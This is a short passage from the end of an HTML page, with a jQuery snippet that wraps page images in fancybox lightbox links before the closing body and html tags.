        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>












</body>
</html>
